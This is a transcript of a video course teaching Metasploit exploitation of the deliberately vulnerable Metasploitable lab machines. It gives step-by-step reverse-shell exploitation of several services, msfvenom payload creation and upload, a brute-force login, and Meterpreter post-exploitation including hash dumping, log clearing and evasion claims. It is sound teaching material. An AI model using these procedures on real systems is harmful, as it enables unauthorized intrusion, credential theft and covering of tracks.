commands on MSF. So you're going to need to use MSF console efficiently, and that's how you dive into some of the customization of the framework. So why don't we just get started? Go ahead and open up your terminal and start PostgreSQL. And because you need database operations, start MSFDB and MSF console. And then before starting the exploitation, let's list the hosts again. And I'm going to start with the Linux machine. So let's list the services. Although this is kind of artificial because it's in a course, I'm not going to give you an exploit name and say exploit this. I don't want to do something like that. I want you to search and create relations between what the results are. And that's how you're going to sort of get a taste of real penetration testing. So you can try to exploit all the services on Metasploitable 2 because there are lots of services with vulnerabilities. So I'm going to do 2 of them. And then let's have a look at the services on Metasploitable 2 again. And here's the Ruby DRB RMI service. And you can see its version number also. So I'm going to copy this and have a search to find an exploit or look at the result of a Nessus scan. I'm also going to type exploit. Now, when you search, of course, you'll immediately see Rapid7's website, and that has the exploit module name. But below, there are some topics about the vulnerability. So let's go back to MSF console and search DRB. So here are the module names. All right, so I'm going to use DRB Remote Code Execution. So the options, set the rhost value, set payload to command Unix reverse, and the reverse connection requires lhost and lport. Set lhost to 10.10.2.11 and set lport to 8788. Show me the options again. Then exploit. So MSF warns us that a session is open. Now you can type the Linux commands here, type ID, and who am I, see who you are, and if config to see a network configuration. So here we are. So let's go back and view the Metasploitable HTTP services. And I'm going to sort the results due to port numbers. Now the service run on port 80 will be my next service to exploit. And I want to check if Nessus finds something. So type vuln p and the IP address of the target. Ooh, yeah, there are many findings about this service. So you can go ahead and examine the results and search for what they are. Are they really vulnerabilities or are they not? And I see that arbitrary PHP code execution, that, well, this finding even has a CVE number. So you can search this number in Metasploit. So search CVE and paste the number. Nothing. Okay, so look at the other rows. All right, so let's copy this one. Let's search that in MSF. Okay, yeah, so this is an exploit. So keep looking at the other lines as well. Another remote code execution. Yeah, okay, so this is what I want. But you can check the other lines as well. And first one with Twicky is a little bit old. PHP CGI argument injection. I think that's the better one. So yeah, I'm going to use this. Show me the options. Let's show the payloads too. And use reverse PHP, Meterpreter payload. Set our host to 10.10.2.14. Set payload to PHP, Meterpreter, reverse TCP. Set lhost and lport also. And now let's show the options and make sure that everything is okay. All right. Then let's exploit. Okay, the PHP Meterpreter shell open. So let's get UID to see just exactly who I am. Sysinfo to view system information. And now these are Meterpreter commands. So in the next section, you're going to dive into Meterpreter. See you on the other side. So here we are. So first, let's clear the screen. As you may have heard me say before, there are many vulnerabilities in Metasploitable 3. I'll try to cover the majority of them. So this way you can go deeper into the machine when you want to, but I'll show you how to get there. Methodology will pretty much be the same. First, I'll look at the services to find vulnerabilities by searching on the Nessus scan, or you can always use a search engine. So let's get started. First, I need to list services, and a sorted list will be better. That's sorted, not sorted. services, O2. So this is going to list services due on the second column. And there are a lot of services here, so let's be more selective, shall we? So you remember that you've enumerated the SMB services before, and I can focus on this port, 445. And let's hope Nessus finds something for these ports. And yeah, you have. So you might remember, too, that this number that you have discovered, you got it. So there's an exploit for this as well. Searching with a CVE number or with this number, and whichever you do, the result is the same. Right, so here are the modules related to that vulnerability. And actually, if you did read about, or if you will read about this particular vulnerability, you will see that this is what the NSA even uses. National Security Agency, that is. So I will use that exploit. MS17010 Eternal Blue. Show me the options. And the target is the same, Metasploitable 3. Set our host to 10.10.2.10. And everything's set, except for the payload. So, show payloads to select a suitable payload. Now, because our target is 64-bit, you can choose 64-bit reverse Meterpreter payload. So let's set lhost to your calling machine. And I'm going to set lport to 4445. And let's see the options again. Nothing to change here, so let's exploit. And everything looks to be quite okay. And the Meterpreter shell opened finally. The shell, you see, has higher privileges. But on the other hand, I want you to be able to clarify this vulnerability. Sometimes when you try this exploit, you might confront a few problems. And sometimes if you want to exploit this vulnerability again, it doesn't get a shell, or it can come up with other problems. So, what to do in a situation like that? Sometimes you just got to shut down the machine, and you can restore it from one of the snapshots. Remember? That's one of the things we addressed earlier when you're setting up, instead of being so eager to just get in and do it. So, let me clear my screen. List services again. And you exploited SMB service on Metasploitable 3. So, now I need the next candidate to exploit. So let's go a little bit further, shall we, with this service, RMI registry. Now you can follow different strategies. For example, you can search for port number, service name, and description. You can also look for vulnerabilities on the internet or as a Nessus result. It's entirely up to you. This time around, I'm going to search RMI as a phrase in a Java platform. So here are the modules related to Java RMI. Now, I'm not going to use these blindly, so I need to find a suitable one. And you can read all the descriptions if you want, and you can also do an internet search. Now, the other ones aren't really related, so I'm going to choose Java JMX server from the exploit module. And this time, I will directly set our host. And I'm going to set the R port also. And check. So, yes, indeed, the target seems to be vulnerable. So, yeah, I'm reading your mind here. You've got a new command, the check command. If the module allows you to do this test, go ahead and use it. Okay, so now let's show some options. So what's missing here? The payload, right. So before setting the payload, let's have a look at the suitable ones. Reverse Java Interpreter payload will fit perfectly for this exploit. Set payload to Java Interpreter reverse TCP. And then set the L host to your Kali's IP address. And set L port to any available port. So I'll set mine to 4447. Show the options again. Nothing to change here. So let's run the exploit. All right, so the session opened, and you are in the machine with a restricted service user. So let's list the services again to choose one. Way too many. So let's just list the Metasploitable 3 services. All right, so let's just list HTTP-related vulnerabilities. And sort them according to port number. Right, so here are some HTTP services on the different ports. Now, I'm going to plan on looking for many of them. But first, I'll start with the Elasticsearch service. So let's copy the service name with its version number to check the internet to see if there's a vulnerability. Right, so just open your browser and paste that in the address bar. Now, if you're seeing what I'm seeing, the Rapid7 site comes up first. And I'll abandon the search for any additional information, but you can go ahead and read some of the articles for this vulnerability. And this is the module name that you will see and we will use. Now, you can also search Elasticsearch as a phrase in Metasploit. And I'll reiterate that there's not a right or wrong here. It's just about whatever suits your strategy. All right, so copy the name, minimize the browser window, type use, and then paste the name of the module. Show me the options. And let's have a look at the payloads too. All right, so set payload to Java Interpreter reverse TCP. Show me the options. Okay. Set our host to 10.10.2.10. Set L host to 10.10.2.11. And I think everything's okay. So, let me show the missing variables. And there are no missing variables. Right, so I can run the module or exploit. Another interpreter session has also opened. So who am I? Get UID. Where am I? Sysinfo. And I'll stay at this stage so that I can send the session to the background. Sessions. And these are the sessions that are on Metasploitable 3. Perfectamundo. Let's dig into some of the other services. So first, let's clear the screen for a fresh exploitation. List HTTP-related services on Metasploitable 3. And this time, let's select Glassfish as a service to exploit. So in the description of the service, there's also the version number for Glassfish. So copy that and open your browser. paste it into the address bar, and search for any vulnerabilities. And again, Rapid7's website comes up first. And of course, you can always read for further information on this particular vulnerability. But right now, I'm just going to get the name of the module and use it. Show me the options. Now, this is a little different from the other ones. It requires username and password for successful exploitation. But you don't discover any Glassfish password. Oh, and by the way, let me also check the R port. And yes, you really do have a service on port 4848. So do I have another Glassfish-related service? Ooh, no, I don't. So I think you may get something searching for Glassfish modules. Search Glassfish. There's not too many modules. And let's have a quick look at which one can fit our purpose here. I think you can make a brute force attack with Glassfish Login as your module. So you can use the password lists that you created before. To do that, let's choose the module, show options, set our host to 10.10.2.10. Now, allow blank passwords, set blank passwords to true, set pass file to the file that you created before, set stop on success to true as well, and also use the username as pass and set user file to the same file. Let's have a look at the options one more time. So I think there's nothing to change here. So let's run the module. Uh-oh, SSL error. What do we do now? Haha. What would you do? See, this is where experience comes in handy. What I would do is, let's go back, and you've got to set SSL to be true. So let's run it again. Okay, great. Now you see how we got the user and password. Username is admin and password are Sploit. So I will go back to Glassfish deployer exploit. I forget the name. So let's do a quick search to memorize. Right, so I get the name and I'll choose it. Show options again. Set our host to Metasploitable 3's IP. Set password to Sploit. Set username to admin. Show me the available payloads. And like always, I will select Reverse Meterpreter TCP. Set lhost to my colleague's IP. Set lport to 4448. Now, do you feel my heart rate jumping? No, probably not, but hopefully you're excited as I am. So let's hit exploit. Oh, something goes wrong. What do you think it is? So let's set SSL to true and try again. And nothing opened. Now, in this particular exploit process, I want to show you that sometimes you can't. You just can't. That doesn't mean you give up. So the Rapid7 team has hardened the machine against this vulnerability. They think that this particular vulnerability makes the machine an easy target. So you couldn't get a shell, but you did get a username and password pair, right? So this is also an improvement, and you got to note that information as well. There's always something to be gained. So let's go ahead into another service. So we'll need to choose a service. And how do we do that? We list them. List only HTTP modules. I always do forget to sort them, but that's easily remedied. And we can look for the service on port 8484. So open up your browser and type 10.10.2.10:8484, and that's what it looks like. So this is what's called a Jenkins application. It's pretty much a leading open source automation server that provides building, deploying, and automating any project. So you can look for anything vulnerable on the website, and that can give us a good start. Or you can go back to the console and try to find an exploit. So let's just quickly check the links. Nothing here. Nothing here. Nothing here. And nothing here. So here are the menus. You can go ahead and examine them. But I want to call your attention to two menus here: System Information and Script Console. First, let's check into the System Information menu. Of course, it's going to be great information. If you don't know about Metasploitable 3, this is a perfect place to start so that you can enumerate the target system. All right, so now let's have a look, a deep dive, as it were, into the Script Console. Now, when you read all of this information provided, I hope that you picked up that you can execute some Groovy scripts from console. Now, at this point, you might not know about Groovy. Can you execute system commands over Groovy? So, how do you find out? Let's search. On a new tab, type how to execute system commands from Jenkins script console. I'm going to just click on the first one. And here's an answer that gets a green check. Let's check the answer. I think there's nothing to worry about in that answer. So I'm going to copy this, and if you want to control it, we can execute it from the script console. So let's paste it and run it. I don't think there's going to be a problem with execution. So let's change the commands in code. So only ls executed. So let's change it to ipconfig, and yeah, this is executed as well. Who am I? Okay. Now, I think that we found what we're looking for. So this obviously is going to take a lot of time, and let's say I don't even know Groovy that well, so you do need to find a reasonable exploit that can do all of this stuff for you, right? So, in a new tab, let's have a search to see if there is an exploit for Script Console. And naturally, Metasploit has an exploit module for this. Perfect. So now you can use this module. So let's go back to MSF Console and choose Jenkins Script Console as our exploit. Show options. Set our host to 10.10.2.10. Set our port to 8484. Set payload to Windows. Interpreter. Reverse TCP. Set lhost for payload to Kali's IP. Set lport to 4443. Now, show the options again, and then exploit. Oh, something went wrong. Okay, so how are you going to fix it? Oh, yeah, you probably already saw. The problem is target URI variable. The URL of the script console page is just like that. So you should change its value to script. I'm going to directly exploit without a further control. And I think that's okay. And that's how you get the interpreter session. Don't forget the where am I and who am I. And then we can send that session to the background. And let's have a look at the list of sessions. So you see you have many sessions running on Metasploitable 3. All right, then let's go to the next service to exploit. So list Metasploitable 3 services again. Now, here you can find an interesting HTTP service. It's got a long description, and this time I'm going to use a port number to get information about the service. And nothing to view from the browser when I go to 10.10.2.10:5985. It's kind of weird, huh? Wouldn't you expect something? So, you've only got this information. A service runs on the port 5985. The only meaningful thing here, of course, is the port number, but it does mean a lot. So, open your browser and search what this port number is typically used for. Now, when you look at that post, you're going to get some extra information. As this post says, this is a WinRM service. So you can search for WinRM exploits. Search WinRM. Haha, that's terrific. You see how you get some of those modules. So let's just use the first one. WinRM auth methods. Show options. Set our hosts to 10.10.2.10 and run the module. All right, so let's do it from the beginning. Display the service on 5985, and you see the information immediately that's saved to the host. And then list the WinRM modules again. Let's use the second one this time. WinRM command. Show options. Set our hosts to Metasploitable 3 IP. Set username to Vagrant. Set password to Vagrant also. Show options to control. Okay, then run the module. And look at that, that's a perfect result. So you can take advantage of this module. So let's have a look over the other modules again. All right, so there is only one exploit module. And let's use this now. Show options. Set our host to 10.10.2.10. Set username to Vagrant. Set password to Vagrant. And show available payloads. And I'll choose 64-bit reverse interpreter TCP as my payload. Set lhost to my collie's IP address. Set lport to 5985. Let's have a look at those options one more time. So everything looks perfect. Then exploit. And there it is. You got the session. So even our exploit code migrates to another process. So let's quickly do a who am I and where am I? And there we are in the Metasploitable 3 with a system-level user privilege. So let's send that session to the background and list the sessions. And we can move on to another service. So list HTTP-related services on Metasploitable 3. And the service which runs on port 8585 has important information. That's right, the WebDAV service. So in that enumeration stage, you have enumerated that you can upload a file to the server. Now, it's time to take advantage of this. Now, remembering what we did before, I'm going to start from the beginning so that you get in the habit of this. First, choose the auxiliary module that provides us with an option to upload a file on the server. Use auxiliary, scanner, HTTP, put. Show me the options. All right, so set our hosts to 10.10.2.10. Set path to /uploads. Next, you must set file data as your variable. Now what I'm going to do here is I'm going to create a PHP interpreter reverse TCP payload and upload that page with this module. So open a new tab. MSF Venom is a standalone payload generator for Metasploit. We're going to discuss that later, but for right now it's going to help us create the suitable payload. So let's type MSF Venom P and the payload name, PHP interpreter reverse TCP. Lhost is 10.10.2.11 and lport is 8585. -F, and that formats the payload, raw, and -O, the output file name, page.php. Okay, so we've created the file that contains our payload. Let's go back to the MSF console. Set the file name to page.php and set file data to the file you've just created. So for one last look at some of our optional controls, let's show options again. And there's nothing to change, so let's run the module. Don't worry about that, you can ignore this. So open your browser and go to 10.10.2.10:8585/uploads. And here is the page.php file. And if you click this page, it goes right back to your Kali. All right, so that's all well and good. However, now you need to prepare a listener for this connection on Kali. So let's go back to the MSF console. Push M is the name of this module. And let's use the multi-handler. Set payload to PHP interpreter reverse TCP, and that's a payload that you've used previously in MSF Venom. Set lhost to your Kali's IP. Set lport to 8585. Last check. Exploit-J. So now the listener will wait for incoming connections in the background. So let's go to the browser and click the page.php. Great. So you got the interpreter session 9. So let's list the session. Now let's interact with session 9 by typing sessions-i9. And now you're interacting with session 9. So let's quickly look at who am I, get UID, and where am I, sysinfo. And great, so you have another session on the machine. And yes, you can go on to another service. So clear that screen for a fresh hack. As you may remember, you discovered a MySQL username while you were doing your enumeration. But just to refresh your memory, let's do it again. So choose the MySQL auxiliary, use auxiliary scanner, MySQL login. Show me the options. And set our hosts to 10.10.2.10. Use blank passwords. Set the user pass file to the dictionary file that you created while you were doing your enumeration. Now set user as pass as the variable, set that also to be true. And let's see the options again. All right, good. So everything looks fine. So let's run the module. And here is the user that you detected. Username is root, and the password is blank. So, with this information, you can directly connect to MySQL database on Metasploitable 3. So to do that, let's open up a new tab. And to connect to MySQL, let's use the command MySQL u, then username root, H for host 10.10.2.10, and excellent, connected to the database. So now you can query data on MySQL. To list all the databases on the server, type show databases. Now don't forget to put a semicolon on the end of the commands. So these are the databases. And to get some information about the MySQL server, type show variables. And here's an example. This is the version of the database. Now, show databases again to enumerate more. Now, you can, of course, change a database in use by typing use WordPress. Now, to display tables in the WordPress database, type show tables. And all the WordPress tables come up here. So, I'm going to view the information in the WP users table. So what we'll do is we'll type select from WP users. There's not too many users, but they may work. Or, you can always start a reverse shell from MySQL. So list the HTTP services on Metasploitable 3 again. And this time you can work on the service that runs on port 8282. Now it's due to be an HTTP service, so I will try to reach it from my browser to display the application that runs on this port. And this is an Apache Tomcat help interface. So at first, I think that the default Tomcat username and password might probably work well here, but unfortunately it's not. So let's find another way. There's always another way. And we'll go back to the MSF console. So of course you can always check the Nessus result for port 8282. vol ns p8282 10.10.2.10. Now have a look at that. There are some findings that you should analyze pretty carefully. When you look into the vulnerability list, you see this line with Apache Access 2 detection. So this finding is relatively new. So let's open up your browser and look for Access 2 exploits. And click here to display the CVE codes about the Apache Access 2. All right, so there are 6 codes here. But as you also can see, the score of the last one is really high. So let's look for this CVE code in Metasploit. But you can always widen your search to search all. So let's go back into the MSF console and search for CV code 2010-0219. And there are two modules for this code. Now, if you are familiar with the MSF structure, you can immediately see the first one is a brute force module to detect a login. Okay, and the second one is an exploit with such login information. So let's have a look at the module information. Info and the exploit module name. And if you look at the variable section, you will see a path variable. So until now, you haven't verified if there is a vulnerability. So to be sure that that's the exploit we want to use, let's go to that path from my browser to verify the path. So why don't you go ahead and do this too. Open your browser now and go to the address 10.10.2.10:8282/access2, and sure enough. So let's click on the administration link. And, well, I think this is the administration page. So let's go back to MSF console. And you can use this exploit. Show the options. Set our host to 10.10.2.10. Set our port to 8282. Show available payloads for this module. Okay. Set payload to Java Meterpreter reverse TCP. Set lhost for this reverse connection to my colleague's IP. And I'll set lport to 8282. So I'm pretty sure I set everything, but just to be sure, let's check one more time, show the options again, and yeah, everything looks good. So let's exploit. And as you see, the module login with the default access user information. And you know it's a good thing to get in the practice of is you can add this information to your dictionary file for Metasploitable 3. So the session opened. So let's get UID and sysinfo. And you've got another successful session on Metasploitable 3. Good job. All right, so there are two popular types of shells, bind and reverse. The usage of them depends on the situation that you're in the network. A bind shell opens up a new service on the target, and it requires you to connect to this service to get a session. But on the other hand, it's going to be different for a reverse shell. When you're using a reverse shell, you first need to open a service on your host to listen for incoming probes from the target. Then the target connects back to your host. So in a penetration test, you will mostly need to be using reverse shells because of these reasons and more. So I'll make it clearer with another example. For instance, you and a target may be in different private networks, or a firewall of the target may block your connection attempts. What do you do? And it's not just limited to these examples. But even when you decide to use a reverse shell, due to some egress firewall rules, the target may not allow you to get a session. And that's when you will try to create a reverse shell over some known ports that's more typically allowed, such as 443, 80, 3389, and so on. So when you create the payload, you only provide one port. So, you know what, it's not an efficient way because it kind of makes you try new payloads with a new port on every attempt. But to avoid this, MSF has another payload type, which is reverse TCP all ports. You're wondering where I was coming from, huh? So The reverse TCP payload only allows connection to one port, but reverse TCP all ports is used to brute force all the ports from 1 to 65,535. So one thing to keep in mind, going through the entire port range from 1 to 65,535 can take a very long time. So think twice before you use it. You don't believe me? Let's see an example on Metasploit 3. So open up your terminal and start Metasploit. Then search the term all ports in payloads. And here are the modules related to the term all ports. And you can probably see the all ports version of some of the payloads that we've been using in the previous lectures. You can also display the information of this module. So let's look at the description of the L port variable. So it starts on port 1. So this means you can set a start value. So before creating a file with that payload, I'm going to start a handler for that. To do that, we'll use exploit multi-handler as our template. Set payload to Windows, Meterpreter, reverse TCP, all ports. Set lhost to Kali's IP address, and show me the options. So I won't use the set L port value. Okay, I'll now open another window to create a .exe file with reverse all ports payload. And we'll use MSF Venom for this. P Windows, Meterpreter, reverse TCP all ports, lhost equals 10.10.2.11. I'm not going to set L port even here. Set file format to .exe and set platform to Windows. So finally, let's give a name to the output file, allports.exe. Now I'll go to another tab and start the exploit in the background. Type jobs to list the background jobs. And here's the job that I've currently created. Now there's no session as well. So let's go to another tab. Now I'm going to start a Python web serve here to be able to download allports.exe from Metasploit 3. And Metasploit 3 is on my second screen. So I'm going to try to bring my current screen over. And okay, so now I will open Internet Explorer. I wonder if these warnings are going to let me. So let's go to http 10.10.2.11:8080. And look at that. As soon as I connect the Kali, the messages show up on the screen. So now let's click and download the allports.exe file. And I'll save that file to the desktop. And as soon as I click on the .exe file in Metasploit 3, a session opened in the MSF console. Let's look at the connected port. It is 1. And here are all the sessions. So one of the things I like to do is I like to bash scripts to automate some tasks when I use Linux or configure something. And thankfully, MSF and I have something in common. You can do the same thing with resource scripts. So by using them, it's easy to automate your repetitive work in MSF. They greatly enable you to do almost anything you can do in the MSF automatically and sequentially. For instance, think of a scenario that you may want to import an mmap scan result into MSF. And then you're going to want to run a series of modules against some services. Or you may routinely run a specific exploit and payload combination against a target. So you can build a resource script, which first imports and map results, and then run specific modules that you've already defined. It's pretty great, isn't it? So it gives you the ability to greatly automate all of your repetitive tasks, and it reduces your testing and development times. So besides running only MSF console commands, you can also directly embed Ruby to do some things like call APIs, interact with objects in the database, and iterate actions. You can use them both ways, from MSF console and the web interface for Metasploit Pro and Community. And many thanks to the MSF contributors, because you can find some of the prepared resource scripts under Metasploit Framework Scripts Resource. These are available prepared scripts, and you can use them with abandon, gladly and proudly. Now, each resource script is designed to perform specific tasks, as well as achieve specific goals. However, you might need to modify the script to run them successfully in your environment. Now, moreover, these scripts have descriptions and tell you exactly what parameters they need. You can always open them and edit them with your preferred text editor in order to make some suitable changes to facilitate your hacking process. So I'm going to show you how to use some of the prepared ones, as well as create your own. So open up your terminal and start MSF console. And I'll assume that you're going to use SMB MS17010 as your auxiliary module. And you will first use auxiliary scanner SMB MS17010. Then set our hosts to 10.10.2.10 and set our port 445, and then run the module. Module execution is completed. So now you can save what you've done to a file so that you can use it later. Metasploit allows you to save at any point with the make rc command. So let's type make rc and specify a path. I'm going to open up a new tab to show you the recorded commands. Terrific! So I've already created a resource file to use Eternal Blue. So let's use this file from Metasploit. To use a resource file from Metasploit, you can use the resource command. So resource, and then the name of the file. Just like that. As you can see here, the module execution is successfully completed. Now, there's also another option with resource files, as I think I mentioned earlier. And now I'm going to close the session and exit the MSF console with the command exit Y. So on your terminal, type MSF console help. And in the help screen, there is a R parameter. This parameter helps you specify a resource file while you are starting the MSF console. So go ahead and type MSF console-R and the name of the resource file for the Eternal Blue exploit. So first, the MSF console will start, and then it will use the commands in the resource file. And sure enough, the command executed successfully again. Perfectamundo. Now, I don't know if you remember what I said before, but you can also use Metasploit prepared resource files. And where are these files? They will be residing in the user share Metasploit framework scripts resource directory. And I think you might find them useful. So let me just show you one real quickly. So let's go to the scripts directory. Open auto pass the hash file. And as you see, Ruby is used in the file. And it defines payload variables and so on. Okay, so you've got some more information on how to use resource files. These are really handy for any expert in penetration testing, which will be you after this course. So now what? In the previous section, you have gained access to the target systems, and your new phase is post-exploitation. So if the scope of the penetration test finishes here, okay, you've got something. You can go and outline your findings in a report. However, if the scope allows you to move on, then you can go way deeper and advance your techniques to see a broad view of the target system. Post-exploitation is arguably the most important way to get a clear picture of a client's security posture. So what the heck is post-exploitation specifically? It's indeed a phase in penetration testing that you will do the information gathering on the exploited systems. You can also escalate your privilege and move from system to system. It actually starts when you get limited or sometimes full access of the target, and you want to search for certain files or folders, dump the user credentials, capture screenshots remotely, dump out the keystrokes from the remote system, escalate your privileges, and also try to make your access persistent. So then that means this section will cover the basics of post-exploitation. Now, MSF helps you a lot with many of the post-exploitation modules. It also provides many payloads to enable you to perform post-exploitation. But what I'm going to do is cover Meterpreter, for the most part, in this next section. Meterpreter is an extension of the Metasploit framework that allows you to leverage Metasploit's functionality. It's also thought to be one of the flagship products in Metasploit. And I think that's absolutely not an underestimation. So, Meterpreter is an advanced, multifunctional payload that can be used to leverage your capabilities dynamically at runtime. So let's move on. Throughout the section, you're going to learn about Meterpreter and examine what it's capable of to reach your post-exploitation goals. So Meterpreter is a custom, dynamically extensible payload that is developed for MSF. Comparing that to other payload types, it's the most used and feature-rich one. Generally speaking, with most other payloads, you're pretty much limited to execute one command at a certain time, simply to interact with the system. If you want to execute some others, such as add a user, download or upload a file, jump into another network, you will see how difficult it is because of exploiting the target again and again and again. So, additionally, normal payloads are not generally stealthy, and this is also undesirable for any pen tester. On the other hand, lucky you have Meterpreter. So it's loaded directly into the memory of an exploited process using a technique called reflexive DLL injection. It's uploaded into the heap of the compromised process on the target and writes nothing to the disk. Now, because it works completely within the memory, it doesn't touch the file system directly if it's not necessary, and it remains generally undetectable. Not gonna say I guarantee stealthy, but it's pretty much always stealthy. And yeah, so as I was saying before, it works in memory and injects a pre-run process, but usually something else like adding a user is probably going to send up an alarm. Who knows? Meterpreter doesn't need to start a new process that might be noticed by an intrusion prevention or detection system. And because of that capability, generally, host intrusion detection systems can't detect it. Now, moreover, the process in which Meterpreter is attached can be changed at any time. And naturally, this makes tracking it very hard. Another important thing about Meterpreter is that it communicates with Metasploit using transport layer security encryption. So it communicates over the stager socket and provides a comprehensive client-side Ruby API. And to me, the best of the best, Meterpreter allows for multitasking by creating multiple sessions. And it also provides a bash-style shell and has features such as command history, tab completion, channels, and many more. So now comes the time to familiarize you with this tool by covering some of the basic commands. Throughout this section, I will show you how to use just about every available Meterpreter command that you can consider with a usage scenario. Okay, so one thing to keep in mind here, what is STD API and priv? First, I'm going to talk about Meterpreter core commands, which can be used in every suitable Meterpreter session. But specifically, STD API and priv are the two most used extensions of Meterpreter. They will load on each session automatically, so that means you don't need to load them separately. And remember, don't hesitate to use the help command at any point for more information. So, let's start her up. So these are the sessions that I gained entry into during the exploitation phase. 1 and 2 are Meterpreter sessions on the Windows machine. Well, Metasploitable 3. 3rd and 4th ones are the Meterpreter sessions for Metasploitable 2. And as you can see here, the 2nd and 4th are the high privilege sessions. Now, I did this specifically because I want to show you that the capability of a session varies due to the privileges of the user of the exploited process. So let's start, well, at the very beginning. So I will first interact with session number 1. GetUID is the command that will give you the name of the user. It also specifies who you are in the system. Now, to get the system information, type sysinfo as your command, and it's going to bring you to the basic information about the exploited system. Now, to observe the difference between a system-level session and a user-level session, you can display the Meterpreter commands. Now, when you type the help command, immediately the available commands will be listed. So this is what you have in a low-level session. Now I'm going to send session 1 into the background again and interact with session number 2. Of course, when you type the help commands, you can easily observe that there are more commands with session 2. Now, in a high-privileged session, you can do many things. And to make it clear, in a low-level session, you can't delete the Windows logs. However, in a higher-level session, it's very easy. Okay, so now let's interact with session 3. Now this one is a low-level session on Metasploitable 2. Oh no, my session died. I can quickly fix that though, because I have an RC file. Okay, great. So now I have a new session on Metasploitable 2. And these are the basic commands that Meterpreter provides you for this session. And now to interact with session 4. The user is root, and these are the session 4 commands. and I'm not going to find any difference between them. But when it comes to using them, you can't perform every action on a limited session. Okay, so now I'm going to interact with session 2 on Metasploitable 3. And again, don't hesitate to ask for help when you're using Meterpreter. And you can either type a question mark or help to view the commands with descriptions. The info command will display the information of modules. So type info, and then the name of the module that you want to view its information. Info post, Windows, gather, check VM. And then after viewing a module, you may want to run this module. So to do so, type run, and then the name of the module. And of course, it's very easy to run a post module. And you may remember earlier that Meterpreter has extensions such as STD API and priv. So these two extensions are loaded automatically on every session, but you may want to load some other ones too. In order to do that, let's use the load command. And with the L option, you can list the extensions. So to load an extension, simply type load and then the name of the extension. Load Kiwi. So I'm going to type help Kiwi to view the help screen for this extension. And now you can see that you will see the Kiwi commands when you ask Meterpreter for help. And if you're done with a session, you can send it into the background. Just type BG or background to do this. Not going to do it now. And to close the session completely, you can either type quit or exit. And this will finish your connection to the target. So you can also perform file system operations from Meterpreter. It allows you to work on both your local system as well as the target system. And the syntax is pretty similar to the Linux bash syntax. To view your current local working directory, just type lpwd. And you can change your local directory with the lcd command, lcd desktop. Now, to list the content of that directory on your local machine, type ls. All right, that's good. But real good is that you can do this on the target machine as well. So let's get the working directory, the pwd command. And you can change the remote directory to another. cd to move in the upper level directory. And move again. And look at that. See, so now I am in the C root directory of the target. You can also just list the content of that directory. Just type ls to do this. Or typing directory, dir, it'll do the same thing. While penetration testing, sometimes you may need to directly view a file from the command line. Cat is the command that can do this for you. So type cat, and then the file name on the target system. Also, you can create and remove directories on the target. So type mkdir to create a directory. And there it is. It's the folder that I've created. Now to remove that folder, type rmdir, and then the name of the folder. And voila, the folder's gone. And of course, you can download and upload files. Meterpreter makes this very easy for you. You don't even need to exploit the system from the start to do these operations. I'll show you. So type download, and then the path of the file that you want to download, as you see me do here. And now I'm going to upload a file. Type upload and the name of the file and then the path on the target system. So I'm going to upload allports.exe as my file to the croot directory. And let's check. There it is. We succeeded. Now there are two more commands regarding file system that I want to show you. In a real-world penetration test, there may be a mounted drive on the target. In order to view these drives, you can use the show mount command. And this will pull up the list of drives for you. And you can also check the MD5 hash of a file on the system. Who knows? You might need that command one day. All right, after Meterpreter has been uploaded into an exploited process memory, it'll give you a wide variety of actions on the target. Up until now, we've done some basic things with file system operations. But this gives you the possibility to run system and network commands. I know you're already familiar with the getUID command. It prints out who is the owner of the exploited process. And this means who you are. In my case, I am the user NT authority system. You're also familiar with the sysinfo command. It'll pull up basic information about the target to your screen. Now, it's a handy little command, but you can do more by manually examining the system if you want to. See, now that you're in, nobody can hold you back if you want to dig deep into the system. There may be some time issues between you and the target. In fact, you might even be in separate time zones. So, to view the local date and time on the target, type local time. So this is Metasploitable 3 local date and time values. Idle time will give you the idea of how long the target has been running. And especially for exploiting servers, sometimes this might come in very handy for you. The PS command will display all processes of your target, and it can also help to be more specific. So type -H to view the help screen. Now with -S, you can get some information about a specific process. So I opened a Notepad instance on Metasploitable 3, and PS-S Notepad shows it. Now, if you're getting a little paranoid, you may be wondering about the process which is exploited by you. So using the getPID will bring you the ID of this process. Oh, and you know something? Killing a process is another option. Kill and then the process ID. And that's how I finished the Notepad process. So that's nice. There is a grep command for processes as well. And here's how you use it. PS, pipe, pgrep, and then provide a term to grep. So I'm going to do it for ls.asss.exe. Of course, you can choose another. Now, believe me, this might not be enough in a penetration test. You may want to run commands directly in the target command line. And you have that option. In fact, Meterpreter has several ways to do this. The execute command is one of them. You can directly run the command, or you can start an interactive shell. Of course, it does depend on your particular needs. But I'll show you. I will start an interactive command shell on Metasploitable 3. Execute-f command.exe-I is what I'm going to do. Now see, that's really cool. dir, net users, and exit. As you can see, it's a perfect way to execute whatever you want on a target. Going to come in very handy when you want to connect a specific address to download a local exploitation code. And the ifconfig is going to help you to view network configuration. Also, ipconfig can do the same for you. And in the internal network, there may be some proxies. By using getProxy, you can get the proxy information. The ARP command will print the ARP table of the target. You might need this command to identify the connection information on this host. And the last command, netstat. It is like real netstat, but it doesn't have all the filtering options. So now, after being able to get a limited Meterpreter shell, which can severely limit actions you can perform on the system, the next thing to do is escalate your privileges to administrative or system-level users. And for that, Meterpreter has a getSystem command, which uses some of the techniques to elevate your privileges on the target. However, I want to point out, in some cases, the getSystem command doesn't solve your escalation problem. And by that I mean that there are some other ways for you to be able to escalate your privileges. So, when getSystem isn't enough, you can migrate a higher privilege process and use getSystem, search for local exploits, and I'm sure that you'll be able to be more imaginative, so you can test your limits as well. So right now, I will use a limited session to try to show you that escalation problem. So here's my limited session on Metasploitable 3. And right here on the screen, you can see that the user is NT Authority Local Service. In such a session, you can't run some commands on the target. So here, let me try clear EV and hash dump. And definitely they are not executed. So the problem here is the user rights. So in such situations, there are some ways that you should follow sequentially. And now the first thing to do is use the getSystem command. Okay, but somehow that doesn't work either. It might be better to run the post module of that command. So let's first look at the definition of the module with the info command. All right, so there are no other variables to set. So then I can run this module. And nothing happened. So the next thing to try, other than your patience, is to migrate another process. So this sometimes works. However, generally when the getSystem is negative, this one is also negative. So to be able to use this command, you must provide a process ID. So let's type ps-s explorer.exe, and now this command brings the PID of the explorer.exe, which you can try to migrate. So let's type migrate, and the PID of explorer.exe, 5144. Okay, but nothing has changed. So like getSystem, there is a migrate post module as well. So let's give that a try. Let's have a look at the definition of the module. And we will need to set the PID and the spawn variables. Otherwise, it'll just migrate a similar process that has lower privileges, right? And now execute this command, type run post Windows, manage migrate, and then PID equals 5144, spawn equals false, and then hit enter. So that doesn't work either. So now the next thing to do is check patches and look for local exploits on the target. How do we do that? Enum patches. will bring you the missing patches on the system. And after a quick look over the description, yeah, you can run it directly. This may take a while, but here in my case, this is the result. 